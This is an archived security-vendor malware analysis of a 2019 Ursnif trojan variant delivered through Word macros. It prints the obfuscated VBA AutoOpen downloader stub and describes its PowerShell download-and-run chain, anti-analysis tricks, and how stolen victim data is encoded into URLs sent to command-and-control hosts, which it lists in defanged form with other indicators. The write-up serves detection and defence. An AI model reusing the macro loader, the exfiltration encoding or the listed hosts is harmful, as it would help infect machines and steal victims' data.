{
	"id": "e8382400-4e67-48db-b109-b87f3a4cdf0a",
	"created_at": "2026-04-06T00:16:45.314789Z",
	"updated_at": "2026-04-10T03:22:13.60337Z",
	"deleted_at": null,
	"sha1_hash": "3d35f40f339daa3fb7e84a488ad5cfa617c5bca3",
	"title": "New Ursnif Variant Spreading by Word Document",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1265270,
	"plain_text": "New Ursnif Variant Spreading by Word Document\r\nBy Xiaopeng Zhang\r\nPublished: 2019-08-07 · Archived: 2026-04-05 18:40:53 UTC\r\nBreaking FortiGuard Labs Threat Research\r\n NOTE: This threat is actively spreading. During my analysis, which started with just a few samples, the volume of captured\r\nsamples and the number of triggers this new variant set off in our global network of sensors kept growing. Because of this,\r\nwe highly recommend that organizations stay alert to this currently expanding threat.\r\nRecently, FortiGuard Labs captured a number of Word documents from the wild, which were spreading a new variant of the\r\nUrsnif trojan.\r\nI did some research on this new variant, and in this blog I will present what it does on a victim’s machine and what kinds of\r\ntechniques it uses. Ursnif trojan, also known as Dreambot, Gozi, and ISFB, has been alive for years and focuses on stealing\r\ninformation from a victim’s machine.\r\nWord Sample Analysis\r\nFigure 1. The Word sample content\r\nThese infected Word documents contain malicious VBA code. In this campaign, the file names of the Word documents are in\r\nthe format: “info_[date].doc”. The sample in this analysis has the name info_07.25.doc.\r\nWhen a victim opens the Word document, it displays a security warning message designed to protect MS Word users from\r\nmalicious macros (VBA code).  However, the document content deceives victims to click the “Enable Content” button, as\r\nshown in Figure 1. When the button is clicked, the malicious VBA code is executed because the code is in an AutoOpen sub\r\nthat is executed at opening the document.\r\nThe malicious code is simple, as shown below:\r\n \r\nhttps://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\r\nPage 1 of 8\n\nSub AutoOpen()\r\n            Set fPzzMCZTdBHCipC = ymwsrw\r\n            Set KiVsBKglbMn = fPzzMCZTdBHCipC.Controls\r\n            KKzPMDRPhZsJz = KiVsBKglbMn(2) + KiVsBKglbMn(0)\r\n            Set PhFMwPKBcLcsm = VBA.GetObject(KiVsBKglbMn(100 - 90 - 9).Text)\r\n            PhFMwPKBcLcsm.Run! KKzPMDRPhZsJz, 0 + 7596\r\nEnd Sub\r\nMore code is read from three controls on the UserForm, named “ymwsrw”. It then puts PowerShell code from control’s text\r\nproperty together and executes it. The code is PowerShell code. I show the code in Figure 2, where you can see how the\r\nPowerShell code is transformed.\r\nFigure 2. Executing the PowerShell code\r\nThe first part is the original PowerShell code that the VBA code generates. As you can see, it is Base64 encoded (-Enc is\r\nshort for -EncodedCommand). After the code is Base64 decoded, the code is shown in the second part, which still contains\r\nBase64 encoded data. It continues to decode the data, then decompresses it to get the final PowerShell code in the bottom\r\npart of Figure 2.\r\nGoing through the final code, it then downloads a file from a URL (with a red underscore) into “$Env:UserProfile” folder\r\nand eventually starts it by calling “[Diagnostics.Process]::STaRt($UpwpWW)”. Of course, results may vary as these\r\ncaptured Word samples use many different URLs to download Ursnif.\r\nRegardless, the downloaded executable file is a variant of Ursnif and the Word document sample is an Ursnif Downloader.\r\nStart Downloaded Ursnif\r\nBy checking the downloaded file, we learned that it had been compiled on July 25th, 2019. When it starts, it dumps several\r\ndynamic code blocks into its memory and executes them. One among them is the main module that performs all Ursnif\r\nwork.    \r\nhttps://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\r\nPage 2 of 8\n\nFigure 3. Extracted Ursnif Main module\r\nIn Figure 3, the data portion of the malware shows the file header of the decompressed Main module. It’s a little tricky here\r\nas it does not have DOS magic word “MZ” that should appear in the first red rectangle, nor the PE header magic word “PE”\r\nthat should be in the second rectangle. Ursnif removed these magic words to prevent its being identified, but Ursnif knows\r\nhow to load this module without them.\r\nIt continues to load every section from the PE structure into a newly allocated memory. It then repairs its relocation data and\r\nimports API functions contained in an import table. When everything is ready, it calls the OEP (Entry Point) of the main\r\nmodule. The process is just like what a packer does.\r\nAnti-Analysis in Main Module of Ursnif\r\nUrsnif uses some anti-analysis techniques to make it harder for it to be analyzed. For example, it hides some API functions,\r\nwhich are parsed dynamically each time they are called so that static analysis is difficult; most data (in the “.bss” section of\r\nPE structure) in the main module is encrypted, and only gets decrypted at runtime. Let’s take a look at the details.\r\nUrsnif registers a vectored exception handler by calling the API RtlAddVectoredExceptionHandler, whose second parameter\r\npoints to the handler function. So, when it runs into any exception, the system will call this handler function first. Figure 4\r\nshows the pseudo code for that.\r\nhttps://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\r\nPage 3 of 8\n\nFigure 4. Register exception handler function\r\nUrsnif uses the exception handler function to decrypt the data in the “.bss” section. To do this, it modifies the memory-protection option for the memory with the “.bss” section, where the encrypted data is in PAGE_NOACCESS (0x1).\r\nTherefore, when Ursnif reads data in this area, the access violation exception (Exception Code C0000005) happens so that\r\nthe exception handler function gets called.\r\nFigure 5 is a screenshot of when Ursnif has just decrypted the data in the “.bss” section. This section’s size is 1000H. Most\r\nconstant strings and API names are here, which are also used throughout Ursnif’s lifetime.\r\nFigure 5. Part of decrypted “.bss” data\r\nThere are a number of key APIs hidden in the main module. When it needs to call an API, it just needs to call a function\r\nnamed “API_Finder” to dynamically load the dll file that the API belongs to and find the API in it by calling LoadLibrary\r\nand then GetProcAddress.\r\nhttps://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\r\nPage 4 of 8\n\nThe API names in the string are just from the decrypted “.bss” section in a structure with the strings and the offsets.\r\n “API_Finder” can locate the API name by its offset. Here is the ASM code snippet when using API_Finder to get API\r\n“CloseClipboard” from “User32.dll”.\r\n \r\n000C9D27   sub_C9D27 proc near\r\n000C9D27    mov     eax, offset off_CC100\r\n000C9D2C    jmp     $+5\r\n000C9D31\r\n000C9D31 loc_C9D31:\r\n000C9D31    push    ecx\r\n000C9D32    push    edx\r\n000C9D33    push    eax             ; API function index\r\n000C9D34    push    offset dword_CB2F4       ; dll name, 0CB150-\u003e \"User32.dll\"\r\n000C9D39    call    API_Finder   ;It calls LoadLibrary and GetProcAddress. The API is in eax.\r\n000C9D3E    pop     edx\r\n000C9D3F    pop     ecx\r\n000C9D40    jmp     eax       ; calls the API function\r\n000C9D40 sub_C9D27 endp\r\n“API_Finder” obtains the API function index (It’s 0xCC100 here) from its second argument, from which the “API_Finder”\r\ncan compute the offset of the string “CloseClipboard”. The first argument to “API_Finder” points to a structure with a\r\nlibrary name. The entry point of “CloseClipboard” is returned in “eax”, which is called at last.\r\nUsing a COM Instance to Send Data to the C\u0026C\r\nIf you keep an eye on the process list in Task Manager when Ursnif runs, you will find that there are many “iexplore.exe”\r\nprocesses that appear and disappear from time to time. And there is a lot of traffic out of “iexplorer.exe”.  That is what\r\nUrsnif does to send out collected data from the victim’s system. It does not directly create the process “iexplorer.exe”, but\r\nCOM (Component Object Model) does because Ursnif creates a COM instance by calling API “CoCreateInstance”, which is\r\na hidden API function. This is the ASM code snippet of calling it.    \r\n \r\n[…]\r\nseg000:000C3E0B                 jz      loc_C3E98\r\nseg000:000C3E11                 push    esi\r\nseg000:000C3E12                 push    offset rrid ; {EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}\r\nseg000:000C3E17                 push    4       ; dwClsContext\r\nseg000:000C3E19                 push    0       ; pUnkOuter\r\nseg000:000C3E1B                 push    offset rclsid ; {0002DF01-0000-0000-C000-000000000046}\r\nseg000:000C3E20                 call    ds:CoCreateInstance\r\nseg000:000C3E26                 test    eax, eax\r\nhttps://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\r\nPage 5 of 8\n\n[…]\r\nThe first argument is a GUID of “{0002DF01-0000-0000-C000-000000000046}”, which is the CLSID of “Internet\r\nExplorer”. The fourth argument is an interface ID, “{EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}”, which is an\r\ninterface of “IWebBrowser”. The COM object can also be created by the string ID “InternetExplorer.Application”.\r\nThe interface “IWebBrowser” implements a variety of methods to enable what you can do with the MS IE browser to access\r\nweb sites such as GoBack(), GoHome(), Navigate(), Refresh(), and so on. COM starts “iexplorer.exe” and later loads the\r\ninterface “IWebBrowser”, whose methods then are ready to be called. Navigate() method is used by Ursnif to send collected\r\ndata to its C\u0026C server, whose first argument is a URL string.\r\nUrsnif has compressed configuration data in the “.reloc” section of the main module. Decompressing it extracts the data\r\nstructure shown in Figure 6.    \r\nFigure 6. Decompressed configuration data\r\nAt the bottom, you may notice the C\u0026C host list includes \"microsoft.com\", \"update.microsoft.com\", \"avast.com\",\r\n\"cdevinoucathrine.info\", \"zcei60houston.club\" and \"kenovella.club\". This seems odd. Why are the hosts of “microsoft” and\r\n“avast” listed here?  In fact, this is a way to deceive researchers who capture and analyze the traffic.\r\nhttps://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\r\nPage 6 of 8\n\nFigure 7. Format of collected information\r\nA snippet of code in Figure 7 allowes Ursnif to format the collected information from victim’s system. One formatted string\r\nlooks like this:\r\n \r\nsoft=3\u0026version=214082\u0026user=0364812000299edca18c7b9e8ed0ab6d\u0026server=12\u0026id=3387\u0026crc=1\u0026uptime=2193\r\n“soft” and “version” are constant.\r\n“user” is a sort of unique user ID. It consists of four DWORDs that were computed from a hash-code of the victim’s\r\nUser Name and Computer Name, as well as its CPU ID.\r\n“server” and “id” are from the decompressed configuration data. They are behind the host strings, 3387 and 12, in\r\nFigure 6.\r\n“crc” is another constant of 1.\r\n“uptime” is a time value that tells the attacker the uptime since the victim’s system started.\r\n Ursnif encodes the above strings using Base64, which will then be a part of a URL. Other than that, it replaces several bytes\r\nwith their hex strings in the encoded string. (For example: “+” becomes “_2B”, “/” becomes “_2F”.) After that, it inserts a\r\nrandom number of “/” into it and adds a prefix “/images/” and suffix “.avi” to make the URL look normal.\r\nNow, the collected data is almost ready to be sent to its C\u0026C server. As I said before, there are six host strings in the\r\ndecompressed configuration. Ursnif picks one host string from them and makes a complete URL using the host and above\r\nencoded string. It will be the first argument of the method \"IWebBrowser.Navigate()\". It picks the next host string after a 20\r\nsecond wait. Below is an example of a URL, which will be sent to the C\u0026C server.\r\n \r\nhxxps://cdevinoucathrine.info/images/SZmbQhNDM/NRU9kkrJ9pgbhJ0ElLjX/GmdR4KRmiqx7Vh8d_2B/e89HXjxRxOy7vuzb_2F1OA\r\nD3eZsE/D_2Fiv5c/ju_2Bs3XEZzWGZSfnBvVAvj/9xxBpMO3_2/BGf9ybUt5cslyUgIK/_2BnKRHLrDUUyi44DVzf/T.avi\r\nThis is a host list of C\u0026C servers that I extracted from two variants:\r\nhxxps://cdevinoucathrine.info\r\nhxxps://zcei60houston.club\r\nhxxps://kenovella.club\r\nhxxps://z76johnson.club\r\nhxxps://s75eagtyec.com\r\nhxxps://s97pe2360.club\r\nSo far, these are all of my findings for this Ursnif variant. I will continue to monitor this campaign for more details.\r\nSolution:\r\nThis malicious Word document has been detected as “VBA/Agent.A329!tr.dldr” by the FortiGuard AntiVirus service. The\r\nCDR (Content Disarm \u0026 Reconstruction) feature in FortiGate and FortiMail can also neutralize this threat by removing all\r\nmalicious VBA code.\r\nThe downloaded file has been detected as “W32/Ursnif.AHSY!tr” by the FortiGuard AntiVirus service.\r\nThe URL used to download Ursnif has been rated as “Malicious Websites” by the FortiGuard WebFilter service.\r\nIoC:\r\nURL:\r\n\"hxxp://npkf32ymonica.com/sywo/fgoow.php?l=joow8.gxl\"\r\nhttps://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\r\nPage 7 of 8\n\nSample SHA256:\r\ninfo_07.25.doc:\r\nAAA7758D75967D28847B3CB8A9B3E3032F31EC45D12C9904A7BC98C189726005\r\nDownloaded executable file:\r\nAAC9D2D21F634157EB8D3867A2C72042A83CABC3F0142B12763312F5A0B0A83A\r\nLearn more about FortiGuard Labs and the FortiGuard Security Services portfolio. Sign up for our weekly FortiGuard\r\nThreat Brief. \r\nRead about the FortiGuard Security Rating Service, which provides security audits and best practices.\r\nSource: https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\r\nhttps://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html"
	],
	"report_names": [
		"ursnif-variant-spreading-word-document.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434605,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3d35f40f339daa3fb7e84a488ad5cfa617c5bca3.pdf",
		"text": "https://archive.orkl.eu/3d35f40f339daa3fb7e84a488ad5cfa617c5bca3.txt",
		"img": "https://archive.orkl.eu/3d35f40f339daa3fb7e84a488ad5cfa617c5bca3.jpg"
	}
}